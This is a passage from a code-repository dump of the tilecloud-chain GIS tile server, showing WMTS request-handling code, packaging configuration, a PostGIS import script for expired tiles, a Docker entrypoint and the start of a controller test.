path[index + 3]\n                        params[\"I\"] = path[index + 4]\n                        params[\"J\"] = last[0]\n                        params[\"INFO_FORMAT\"] = layer.get(\"info_formats\", [\"application/vnd.ogc.gml\"])[0]\n                    else:\n                        return self.error(config, 400, \"Wrong path length\", **kwargs)\n\n                    params[\"FORMAT\"] = layer[\"mime_type\"]\n            else:\n                if \"SERVICE\" not in params or \"REQUEST\" not in params or \"VERSION\" not in params:\n                    return self.error(config, 400, \"Not all required parameters are present\", **kwargs)\n\n            if params[\"SERVICE\"] != \"WMTS\":\n                return self.error(config, 400, f\"Wrong Service '{params['SERVICE']}'\", **kwargs)\n            if params[\"VERSION\"] != \"1.0.0\":\n                return self.error(config, 400, f\"Wrong Version '{params['VERSION']}'\", **kwargs)\n\n            if params[\"REQUEST\"] == \"GetCapabilities\":\n                headers = {\n                    \"Content-Type\": \"application/xml\",\n                    \"Expires\": (\n                        datetime.datetime.utcnow() + datetime.timedelta(hours=self.get_expires_hours(config))\n                    ).isoformat(),\n                    \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n                    \"Access-Control-Allow-Origin\": \"*\",\n                    \"Access-Control-Allow-Methods\": \"GET\",\n                }\n                cache = self.get_cache(config)\n                if \"wmtscapabilities_file\" in cache:\n                    wmtscapabilities_file = 
cache[\"wmtscapabilities_file\"]\n return self._get(wmtscapabilities_file, headers, config=config, **kwargs)\n else:\n body = controller.get_wmts_capabilities(\n tilegeneration, self.get_cache_name(config), config=config\n )\n assert body\n headers[\"Content-Type\"] = \"application/xml\"\n return self.response(config, body.encode(\"utf-8\"), headers=headers, **kwargs)\n\n if (\n \"FORMAT\" not in params\n or \"LAYER\" not in params\n or \"TILEMATRIXSET\" not in params\n or \"TILEMATRIX\" not in params\n or \"TILEROW\" not in params\n or \"TILECOL\" not in params\n ):\n return self.error(config, 400, \"Not all required parameters are present\", **kwargs)\n\n if not path:\n if params[\"LAYER\"] in self.get_layers(config):\n layer = cast(\n tilecloud_chain.configuration.LayerWms,\n config.config[\"layers\"][params[\"LAYER\"]],\n )\n else:\n return self.error(config, 400, f\"Wrong Layer '{params['LAYER']}'\", **kwargs)\n\n for dimension in layer.get(\"dimensions\", []):\n value = (\n params[dimension[\"name\"].upper()]\n if dimension[\"name\"].upper() in params\n else dimension[\"default\"]\n )\n dimensions.append(value)\n metadata[\"dimension_\" + dimension[\"name\"]] = value\n\n if params[\"STYLE\"] != layer[\"wmts_style\"]:\n return self.error(config, 400, f\"Wrong Style '{params['STYLE']}'\", **kwargs)\n if params[\"TILEMATRIXSET\"] != layer[\"grid\"]:\n return self.error(config, 400, f\"Wrong TileMatrixSet '{params['TILEMATRIXSET']}'\", **kwargs)\n\n metadata[\"layer\"] = params[\"LAYER\"]\n metadata[\"config_file\"] = config.file\n tile = Tile(\n TileCoord(\n # TODO fix for matrix_identifier = resolution\n int(params[\"TILEMATRIX\"]),\n int(params[\"TILECOL\"]),\n int(params[\"TILEROW\"]),\n ),\n metadata=metadata,\n )\n\n if params[\"REQUEST\"] == \"GetFeatureInfo\":\n if \"I\" not in params or \"J\" not in params or \"INFO_FORMAT\" not in params:\n return self.error(config, 400, \"Not all required parameters are present\", **kwargs)\n if \"query_layers\" in layer:\n return self.forward(\n config,\n layer[\"url\"]\n + \"?\"\n + urlencode(\n {\n \"SERVICE\": \"WMS\",\n \"VERSION\": layer.get(\"version\", \"1.1.1\"),\n \"REQUEST\": \"GetFeatureInfo\",\n \"LAYERS\": layer[\"layers\"],\n \"QUERY_LAYERS\": layer[\"query_layers\"],\n \"STYLES\": params[\"STYLE\"],\n \"FORMAT\": params[\"FORMAT\"],\n \"INFO_FORMAT\": params[\"INFO_FORMAT\"],\n \"WIDTH\": config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"],\n \"HEIGHT\": config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"],\n \"SRS\": config.config[\"grids\"][layer[\"grid\"]][\"srs\"],\n \"BBOX\": tilegeneration.get_grid(config, layer[\"grid\"]).extent(tile.tilecoord),\n \"X\": params[\"I\"],\n \"Y\": params[\"J\"],\n }\n ),\n no_cache=True,\n **kwargs,\n )\n else:\n return self.error(config, 400, f\"Layer '{params['LAYER']}' not queryable\", **kwargs)\n\n if params[\"REQUEST\"] != \"GetTile\":\n return self.error(config, 400, f\"Wrong Request '{params['REQUEST']}'\", **kwargs)\n\n if params[\"FORMAT\"] != layer[\"mime_type\"]:\n return self.error(config, 400, f\"Wrong Format '{params['FORMAT']}'\", **kwargs)\n\n if tile.tilecoord.z > self.get_max_zoom_seed(config, params[\"LAYER\"]):\n return self._map_cache(config, layer, tile, kwargs)\n\n layer_filter = self.get_filter(config, params[\"LAYER\"])\n if layer_filter:\n meta_size = layer[\"meta_size\"]\n meta_tilecoord = (\n TileCoord(\n # TODO fix for matrix_identifier = resolution\n tile.tilecoord.z,\n round(tile.tilecoord.x / meta_size * meta_size),\n round(tile.tilecoord.y / 
meta_size * meta_size),\n meta_size,\n )\n if meta_size != 1\n else tile.tilecoord\n )\n if not layer_filter.filter_tilecoord(\n config, meta_tilecoord, params[\"LAYER\"], host=self.get_host(**kwargs)\n ):\n return self._map_cache(config, layer, tile, kwargs)\n\n store = self.get_store(config, params[\"LAYER\"])\n if store is None:\n return self.error(\n config,\n 400,\n f\"No store found for layer '{params['LAYER']}'\",\n **kwargs,\n )\n\n tile2 = store.get_one(tile)\n if tile2:\n if tile2.error:\n return self.error(config, 500, tile2.error, **kwargs)\n\n assert tile2.data\n assert tile2.content_type\n return self.response(\n config,\n tile2.data,\n headers={\n \"Content-Type\": tile2.content_type,\n \"Expires\": (\n datetime.datetime.utcnow()\n + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n \"Tile-Backend\": \"Cache\",\n },\n **kwargs,\n )\n else:\n return self.error(config, 204, **kwargs)\n except HTTPException:\n raise\n except Exception:\n logger.exception(\"An unknown error occurred\")\n raise\n\n def _map_cache(\n self,\n config: tilecloud_chain.DatedConfig,\n layer: tilecloud_chain.configuration.Layer,\n tile: Tile,\n kwargs: Dict[str, Any],\n ) -> Response:\n \"\"\"Get the tile on a cache of tile.\"\"\"\n assert tilegeneration\n return internal_mapcache.fetch(config, self, tilegeneration, layer, tile, kwargs)\n\n def forward(\n self,\n config: tilecloud_chain.DatedConfig,\n url: str,\n headers: Optional[Any] = None,\n no_cache: bool = False,\n **kwargs: Any,\n ) -> Response:\n \"\"\"Forward the request on a fallback WMS server.\"\"\"\n if headers is None:\n headers = {}\n if no_cache:\n headers[\"Cache-Control\"] = \"no-cache\"\n headers[\"Pragma\"] = \"no-cache\"\n\n response = requests.get(url, headers=headers) # nosec\n if response.status_code == 200:\n response_headers = dict(response.headers)\n if no_cache:\n response_headers[\"Cache-Control\"] = \"no-cache, no-store\"\n response_headers[\"Pragma\"] = \"no-cache\"\n else:\n response_headers[\"Expires\"] = (\n datetime.datetime.utcnow() + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat()\n response_headers[\"Cache-Control\"] = f\"max-age={3600 * self.get_expires_hours(config)}\"\n response_headers[\"Access-Control-Allow-Origin\"] = \"*\"\n response_headers[\"Access-Control-Allow-Methods\"] = \"GET\"\n return self.response(config, response.content, headers=response_headers, **kwargs)\n else:\n message = (\n f\"The URL '{url}' return '{response.status_code} {response.reason}', \"\n f\"content:\\n{response.text}\"\n )\n logger.warning(message)\n return self.error(config, 502, message=message, **kwargs)\n\n def error(\n self,\n config: tilecloud_chain.DatedConfig,\n code: int,\n message: Optional[Union[Exception, str]] = \"\",\n **kwargs: Any,\n ) -> Response:\n \"\"\"Build the error, should be implemented in a sub class.\"\"\"\n\n raise NotImplementedError\n\n def response(\n self,\n config: tilecloud_chain.DatedConfig,\n data: bytes,\n headers: Optional[Dict[str, str]] = None,\n **kwargs: Any,\n ) -> Response:\n \"\"\"Build the response, should be implemented in a sub class.\"\"\"\n\n raise NotImplementedError\n\n def get_host(self, **kwargs: Any) -> str:\n \"\"\"Get the host used in Prometheus stats and in the JSON logs, should be implemented in a sub class.\"\"\"\n\n del kwargs\n return \"localhost\"\n\n\nif 
TYPE_CHECKING:\n WsgiServerBase = Server[List[bytes]]\nelse:\n WsgiServerBase = Server\n\n\nclass WsgiServer(WsgiServerBase):\n \"\"\"Convert the error and response for the WSGI server.\"\"\"\n\n HTTP_MESSAGES = {\n 204: \"204 No Content\",\n 400: \"400 Bad Request\",\n 403: \"403 Forbidden\",\n 404: \"404 Not Found\",\n 502: \"502 Bad Gateway\",\n }\n\n def error(\n self,\n config: tilecloud_chain.DatedConfig,\n code: int,\n message: Optional[Union[Exception, str]] = \"\",\n **kwargs: Any,\n ) -> List[bytes]:\n \"\"\"Build the error.\"\"\"\n assert message is not None\n kwargs[\"start_response\"](self.HTTP_MESSAGES[code], [])\n return [str(message).encode()]\n\n def response(\n self,\n config: tilecloud_chain.DatedConfig,\n data: bytes,\n headers: Optional[Dict[str, str]] = None,\n **kwargs: Any,\n ) -> List[bytes]:\n \"\"\"Build the response.\"\"\"\n if headers is None:\n headers = {}\n headers[\"Content-Length\"] = str(len(data))\n kwargs[\"start_response\"](\"200 OK\", headers.items())\n return [data]\n\n\ndef app_factory(\n global_config: Any,\n configfile: Optional[str] = os.environ.get(\"TILEGENERATION_CONFIGFILE\"),\n **local_conf: Any,\n) -> WsgiServer:\n \"\"\"Create the WSGI server.\"\"\"\n del global_config\n del local_conf\n\n init_tilegeneration(configfile)\n\n return WsgiServer()\n\n\nif TYPE_CHECKING:\n PyramidServerBase = Server[pyramid.response.Response]\nelse:\n PyramidServerBase = Server\n\n\nclass PyramidServer(PyramidServerBase):\n \"\"\"Convert the error and response for Pyramid.\"\"\"\n\n def error(\n self,\n config: tilecloud_chain.DatedConfig,\n code: int,\n message: Optional[Union[Exception, str]] = None,\n **kwargs: Any,\n ) -> pyramid.response.Response:\n \"\"\"Build the Pyramid response on error.\"\"\"\n headers = {\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n }\n if code < 300:\n headers.update(\n {\n \"Expires\": (\n datetime.datetime.utcnow() + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n }\n )\n return exception_response(code, detail=message, headers=headers)\n\n raise exception_response(code, detail=message, headers=headers)\n\n def response(\n self,\n config: tilecloud_chain.DatedConfig,\n data: bytes,\n headers: Optional[Dict[str, str]] = None,\n **kwargs: Any,\n ) -> pyramid.response.Response:\n \"\"\"Build the Pyramid response.\"\"\"\n if headers is None:\n headers = {}\n request: pyramid.request.Request = kwargs[\"request\"]\n request.response.headers = headers\n if isinstance(data, memoryview):\n request.response.body_file = data\n else:\n request.response.body = data\n return request.response\n\n def get_host(self, **kwargs: Any) -> str:\n request: pyramid.request.Request = kwargs[\"request\"]\n assert isinstance(request.host, str)\n return request.host\n\n\npyramid_server = None\n\n\nclass PyramidView:\n \"\"\"The Pyramid view.\"\"\"\n\n def __init__(self, request: Request) -> None:\n \"\"\"Init the Pyramid view.\"\"\"\n self.request = request\n\n global pyramid_server # pylint: disable=global-statement\n\n init_tilegeneration(request.registry.settings.get(\"tilegeneration_configfile\"))\n\n if pyramid_server is None:\n pyramid_server = PyramidServer()\n\n self.server = pyramid_server\n\n def __call__(self) -> pyramid.response.Response:\n \"\"\"Call the Pyramid view.\"\"\"\n params = {}\n path = None\n\n if \"path\" in self.request.matchdict:\n path = self.request.matchdict[\"path\"]\n\n for param, 
value in self.request.params.items():\n params[param.upper()] = value\n\n assert tilegeneration\n return self.server.serve(\n path,\n params,\n host=self.request.host,\n config=tilegeneration.get_host_config(self.request.host),\n request=self.request,\n )\n\n\ndef forbidden(request: pyramid.request.Request) -> pyramid.response.Response:\n \"\"\"Return a 403 Forbidden response.\"\"\"\n is_auth = c2cwsgiutils.auth.is_auth(request)\n\n if is_auth:\n return pyramid.httpexceptions.HTTPForbidden(request.exception.message)\n return pyramid.httpexceptions.HTTPFound(\n location=request.route_url(\n \"c2c_github_login\",\n _query={\"came_from\": request.current_route_url()},\n )\n )\n\n\ndef main(global_config: Any, **settings: Any) -> Router:\n \"\"\"Start the server in Pyramid.\"\"\"\n del global_config # unused\n\n config = Configurator(settings=settings)\n\n config.set_session_factory(\n pyramid.session.BaseCookieSessionFactory(json)\n if os.environ.get(\"TILECLOUD_CHAIN_DEBUG_SESSION\", \"false\").lower() == \"true\"\n else pyramid.session.SignedCookieSessionFactory(\n os.environ[\"TILECLOUD_CHAIN_SESSION_SECRET\"], salt=os.environ[\"TILECLOUD_CHAIN_SESSION_SALT\"]\n )\n )\n\n init_tilegeneration(settings.get(\"tilegeneration_configfile\"))\n assert tilegeneration\n\n config.include(c2cwsgiutils.pyramid.includeme)\n health_check.HealthCheck(config)\n add_mako_renderer(config, \".html\")\n config.set_security_policy(tilecloud_chain.security.SecurityPolicy())\n config.add_forbidden_view(forbidden)\n\n config.add_route(\n \"admin\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}\",\n request_method=\"GET\",\n )\n config.add_route(\n \"admin_slash\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/\",\n request_method=\"GET\",\n )\n config.add_route(\n \"admin_run\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/run\",\n request_method=\"POST\",\n )\n config.add_route(\n \"admin_test\",\n f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/test\",\n request_method=\"GET\",\n )\n\n config.add_static_view(\n name=f\"/{tilegeneration.get_main_config().config['server']['admin_path']}/static\",\n path=\"/app/tilecloud_chain/static\",\n )\n\n config.add_route(\"tiles\", \"/*path\", request_method=\"GET\")\n config.add_view(PyramidView, route_name=\"tiles\")\n\n config.scan(\"tilecloud_chain.views\")\n\n return config.make_wsgi_app()\n" }, { "alpha_fraction": 0.6396505236625671, "alphanum_fraction": 0.6794214844703674, "avg_line_length": 30.913461685180664, "blob_id": "b1b558a8f1996438882bcbdb1da1ed1907ada6fd", "content_id": "b1ac116e44bdfc694e71bee7df78db944ee4fc69", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 3319, "license_type": "permissive", "max_line_length": 152, "num_lines": 104, "path": "/pyproject.toml", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "[tool.black]\nline-length = 110\ntarget-version = [\"py38\"]\n\n[tool.mypy]\npython_version = 3.8\nwarn_redundant_casts = true\nwarn_unused_ignores = true\nignore_missing_imports = true\nstrict = true\n\n[tool.isort]\nprofile = \"black\"\nline_length = 110\nknown_first_party = \"tilecloud\"\nknown_third_party = \"c2cwsgiutils\"\n\n[tool.poetry]\nname = \"tilecloud-chain\"\nversion = \"0.0.0\"\ndescription = \"Tools to generate tiles from WMS or Mapnik, to S3, Berkeley DB, MBTiles, or local filesystem in WMTS layout using Amazon cloud services.\"\nreadme 
= \"README.md\"\nauthors = [\"Camptocamp <[email protected]>\"]\nrepository = \"https://github.com/camptocamp/tilecloud-chain\"\nlicense = \"BSD-2-Clause\"\nkeywords = [\"gis\", \"tilecloud\", \"chain\"]\npackages = [{ include = \"tilecloud_chain\" }]\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Pyramid\",\n \"Intended Audience :: Other Audience\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering :: GIS\",\n \"Typing :: Typed\",\n]\ninclude = [\"tilecloud_chain/py.typed\", \"tilecloud_chain/*.rst\", \"tilecloud_chain/*.md\"]\n\n[tool.poetry.scripts]\ngenerate-tiles = \"tilecloud_chain.generate:main\"\ngenerate-controller = \"tilecloud_chain.controller:main\"\ngenerate-cost = \"tilecloud_chain.cost:main\"\ngenerate-copy = \"tilecloud_chain.copy_:main\"\ngenerate-process = \"tilecloud_chain.copy_:process\"\nimport-expiretiles = \"tilecloud_chain.expiretiles:main\"\n\n[tool.poetry.plugins.\"pyramid.scaffold\"]\ntilecloud_chain = \"tilecloud_chain.scaffolds:Create\"\n\n[tool.poetry.plugins.\"paste.app_factory\"]\nmain = \"tilecloud_chain.server:main\"\n\n[tool.poetry.dependencies]\npython = \">=3.8,<3.11\"\nc2cwsgiutils = { version = \"6.0.0.dev142\", extras = [\"standard\", \"broadcast\", \"oauth2\"] }\npyramid-mako = \"1.1.0\"\npython-dateutil = \"2.8.2\"\ntilecloud = { version = \"1.10.0\", extras = [\"azure\", \"aws\", \"redis\", \"wsgi\"] }\nJinja2 = \"3.1.2\"\nPyYAML = \"6.0.1\"\nShapely = \"2.0.1\"\njsonschema = \"4.18.4\"\npyramid = \"2.0.1\"\njsonschema-validator-new = \"0.1.0\"\nazure-storage-blob = \"12.17.0\"\nwaitress = \"2.1.2\"\ncertifi = \"2023.7.22\"\n# Workaround to be able to do the lock file update\nurllib3 = \"1.26.16\"\n\n[tool.poetry.dev-dependencies]\nprospector = { extras = [\"with_mypy\", \"with_bandit\", \"with_pyroma\"], version = \"1.10.2\" }\nc2cwsgiutils = { version = \"6.0.0.dev142\", extras = [\"test_images\"] }\nscikit-image = { version = \"0.21.0\" }\npytest = \"7.4.0\"\ntestfixtures = \"7.1.0\"\ncoverage = \"7.2.7\"\ntypes-redis = \"4.6.0.3\"\ntypes-requests = \"2.31.0.2\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\", \"poetry-dynamic-versioning\", \"poetry-plugin-tweak-dependencies-version\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\n[tool.poetry-dynamic-versioning]\nenable = true\nvcs = \"git\"\npattern = \"^(?P<base>\\\\d+(\\\\.\\\\d+)*)\"\nformat-jinja = \"\"\"\n{%- if env.get(\"VERSION_TYPE\") == \"version_branch\" -%}\n{{serialize_pep440(bump_version(base, 1 if env.get(\"IS_MASTER\") == \"TRUE\" else 2), dev=distance)}}\n{%- elif distance == 0 -%}\n{{serialize_pep440(base)}}\n{%- else -%}\n{{serialize_pep440(bump_version(base), dev=distance)}}\n{%- endif -%}\n\"\"\"\n\n[tool.poetry-plugin-tweak-dependencies-version]\ndefault = \"present\"\n" }, { "alpha_fraction": 0.45721665024757385, "alphanum_fraction": 0.4738456606864929, "avg_line_length": 32.481082916259766, "blob_id": "8c7b617d56784172fc98abe4e057436231e2c12d", "content_id": "a1037c6ac7320389d56bdf29d2d2a86f70a6d198", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6194, "license_type": "permissive", "max_line_length": 111, "num_lines": 185, "path": "/tilecloud_chain/expiretiles.py", "repo_name": "camptocamp/tilecloud-chain", 
"src_encoding": "UTF-8", "text": "import logging\nimport sys\nfrom argparse import ArgumentParser\n\nimport psycopg2.sql\nfrom shapely.geometry import MultiPolygon, Polygon\nfrom shapely.ops import unary_union\n\nfrom tilecloud.grid.quad import QuadTileGrid\nfrom tilecloud_chain import parse_tilecoord\n\nlogger = logging.getLogger(__name__)\n\n\ndef main() -> None:\n \"\"\"Import the osm2pgsql expire-tiles file to Postgres.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to import the osm2pgsql expire-tiles file to Postgres\", prog=sys.argv[0]\n )\n parser.add_argument(\n \"--buffer\",\n type=float,\n default=0.0,\n help=\"Extent buffer to the tiles [m], default is 0\",\n )\n parser.add_argument(\n \"--simplify\",\n type=float,\n default=0.0,\n help=\"Simplify the result geometry [m], default is 0\",\n )\n parser.add_argument(\n \"--create\",\n default=False,\n action=\"store_true\",\n help=\"create the table if not exists\",\n )\n parser.add_argument(\n \"--delete\",\n default=False,\n action=\"store_true\",\n help=\"empty the table\",\n )\n parser.add_argument(\n \"file\",\n metavar=\"FILE\",\n help=\"The osm2pgsql expire-tiles file\",\n )\n parser.add_argument(\n \"connection\",\n metavar=\"CONNECTION\",\n help=(\n \"The PostgreSQL connection string e.g. \"\n '\"user=www-data password=www-data dbname=sig host=localhost\"'\n ),\n )\n parser.add_argument(\n \"table\",\n metavar=\"TABLE\",\n help=\"The PostgreSQL table to fill\",\n )\n parser.add_argument(\n \"--schema\",\n default=\"public\",\n help=\"The PostgreSQL schema to use (should already exists), default is public\",\n )\n parser.add_argument(\n \"column\",\n metavar=\"COLUMN\",\n default=\"geom\",\n nargs=\"?\",\n help='The PostgreSQL column, default is \"geom\"',\n )\n parser.add_argument(\n \"--srid\",\n type=int,\n default=3857,\n nargs=\"?\",\n help=\"The stored geometry SRID, no conversion by default (3857)\",\n )\n options = parser.parse_args()\n\n connection = psycopg2.connect(options.connection)\n cursor = connection.cursor()\n\n if options.create:\n cursor.execute(\n \"SELECT count(*) FROM pg_tables WHERE schemaname=%(schema)s AND tablename=%(table)s\",\n {\"schema\": options.schema, \"table\": options.table},\n )\n if cursor.fetchone()[0] == 0:\n cursor.execute(\n psycopg2.sql.SQL(\"CREATE TABLE IF NOT EXISTS {}.{} (id serial)\").format(\n psycopg2.sql.Identifier(options.schema), psycopg2.sql.Identifier(options.table)\n )\n )\n cursor.execute(\n \"SELECT AddGeometryColumn(%(schema)s, %(table)s, %(column)s, %(srid)s, 'MULTIPOLYGON', 2)\",\n {\n \"schema\": options.schema,\n \"table\": options.table,\n \"column\": options.column,\n \"srid\": options.srid,\n },\n )\n\n if options.delete:\n cursor.execute(psycopg2.sql.SQL(\"DELETE FROM {}\").format(psycopg2.sql.Identifier(options.table)))\n\n geoms = []\n grid = QuadTileGrid(\n max_extent=(-20037508.34, -20037508.34, 20037508.34, 20037508.34),\n )\n with open(options.file, encoding=\"utf-8\") as f:\n for coord in f:\n extent = grid.extent(parse_tilecoord(coord), options.buffer)\n geoms.append(\n Polygon(\n (\n (extent[0], extent[1]),\n (extent[0], extent[3]),\n (extent[2], extent[3]),\n (extent[2], extent[1]),\n )\n )\n )\n if len(geoms) == 0:\n print(\"No coords found\")\n connection.commit()\n cursor.close()\n connection.close()\n sys.exit(0)\n geom = unary_union(geoms)\n if geom.geom_type == \"Polygon\":\n geom = MultiPolygon((geom,))\n\n if options.simplify > 0:\n geom.simplify(options.simplify)\n\n if options.srid <= 0:\n cursor.execute(\n 
psycopg2.sql.SQL(\"INSERT INTO {} ({}) VALUES (ST_GeomFromText(%(geom)s))\").format(\n psycopg2.sql.Identifier(options.table),\n psycopg2.sql.Identifier(options.column),\n ),\n {\n \"geom\": geom.wkt,\n },\n )\n\n elif options.srid != 3857:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {} ({}) VALUES (ST_Transform(ST_GeomFromText(%(geom)s, 3857), %(srid)s))\"\n ).format(\n psycopg2.sql.Identifier(options.table),\n psycopg2.sql.Identifier(options.column),\n ),\n {\n \"geom\": geom.wkt,\n \"srid\": options.srid,\n },\n )\n else:\n cursor.execute(\n psycopg2.sql.SQL(\"INSERT INTO {} ({}) VALUES (ST_GeomFromText(%(geom)s, 3857))\").format(\n psycopg2.sql.Identifier(options.table),\n psycopg2.sql.Identifier(options.column),\n ),\n {\n \"geom\": geom.wkt,\n \"srid\": options.srid,\n },\n )\n\n connection.commit()\n cursor.close()\n connection.close()\n print(\"Import successful\")\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n sys.exit(1)\n" }, { "alpha_fraction": 0.6297444105148315, "alphanum_fraction": 0.6312935948371887, "avg_line_length": 28.340909957885742, "blob_id": "c81679c1e1676a95505dc5ce3a5277aabe39f590", "content_id": "6336ee63dd9166bd9a24d6bc2b7438fa5a905211", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1291, "license_type": "permissive", "max_line_length": 106, "num_lines": 44, "path": "/docker/run", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport os\nimport stat\nimport subprocess # nosec\nimport sys\n\nif \"GROUP_ID\" not in os.environ:\n sys.exit(\"The GROUP_ID environment variable is required\")\n\nif \"USER_ID\" not in os.environ:\n sys.exit(\"The USER_ID environment variable is required\")\n\nif \"USER_NAME\" not in os.environ:\n sys.exit(\"The USER_NAME environment variable is required\")\n\nif \"UMASK\" not in os.environ:\n sys.exit(\"The UMASK environment variable is required\")\n\nsubprocess.check_call([\"groupadd\", \"-g\", os.environ[\"GROUP_ID\"], \"geomapfish\"]) # nosec\nsubprocess.check_call( # nosec\n [\n \"useradd\",\n \"--shell\",\n \"/bin/bash\",\n \"--uid\",\n os.environ[\"USER_ID\"],\n \"--gid\",\n os.environ[\"GROUP_ID\"],\n os.environ[\"USER_NAME\"],\n ]\n)\n\nrun_file_name = \"/tmp/run\" # nosec\nwith open(run_file_name, \"w\") as run_file:\n run_file.write(\"#!/usr/bin/python\\n\")\n run_file.write(\"import subprocess, os\\n\")\n run_file.write(\"os.umask(0o{})\\n\".format(os.environ[\"UMASK\"]))\n run_file.write(f\"subprocess.check_call({repr(sys.argv[1:])})\\n\")\n\nos.chmod(\n run_file_name, stat.S_IRUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH\n)\nsubprocess.check_call([\"su\", os.environ[\"USER_NAME\"], \"-c\", run_file_name]) # nosec\n" }, { "alpha_fraction": 0.5537400245666504, "alphanum_fraction": 0.6074878573417664, "avg_line_length": 32.67156982421875, "blob_id": "7e2fa31cf5ffe4138d57ce7034470dc3d31293db", "content_id": "a1f41f0870e1a8e7dbf461f10520a3496d545fbe", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64077, "license_type": "permissive", "max_line_length": 126, "num_lines": 1903, "path": "/tilecloud_chain/tests/test_controller.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\n\nfrom tilecloud_chain import TileGeneration, controller\nfrom tilecloud_chain.tests import 
CompareCase\n\n\nclass TestController(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_capabilities(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-fix.yaml\", configure_logging=False)\n config = gene.get_config(\"tilegeneration/test-fix.yaml\")\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, config.config[\"generation\"][\"default_cache\"]),\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:ServiceIdentification>\n <ows:Title>Some title</ows:Title>\n <ows:Abstract>Some abstract</ows:Abstract>\n <ows:Keywords>\n <ows:Keyword>some</ows:Keyword>\n <ows:Keyword>keywords</ows:Keyword>\n </ows:Keywords>\n <ows:ServiceType>OGC WMTS</ows:ServiceType>\n <ows:ServiceTypeVersion>1.0.0</ows:ServiceTypeVersion>\n <ows:Fees>None</ows:Fees>\n <ows:AccessConstraint>None</ows:AccessConstraint>\n </ows:ServiceIdentification>\n <ows:ServiceProvider>\n <ows:ProviderName>The provider name</ows:ProviderName>\n <ows:ProviderSite>The provider URL</ows:ProviderSite>\n <ows:ServiceContact>\n <ows:IndividualName>The contact name</ows:IndividualName>\n <ows:PositionName>The position name</ows:PositionName>\n <ows:ContactInfo>\n <ows:Phone>\n <ows:Voice>\\+41 11 222 33 44</ows:Voice>\n <ows:Facsimile>\\+41 11 222 33 44</ows:Facsimile>\n </ows:Phone>\n <ows:Address>\n <ows:DeliveryPoint>Address delivery</ows:DeliveryPoint>\n <ows:City>Berne</ows:City>\n <ows:AdministrativeArea>BE</ows:AdministrativeArea>\n <ows:PostalCode>3000</ows:PostalCode>\n <ows:Country>Switzerland</ows:Country>\n <ows:ElectronicMailAddress>[email protected]</ows:ElectronicMailAddress>\n </ows:Address>\n </ows:ContactInfo>\n </ows:ServiceContact>\n </ows:ServiceProvider>\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n 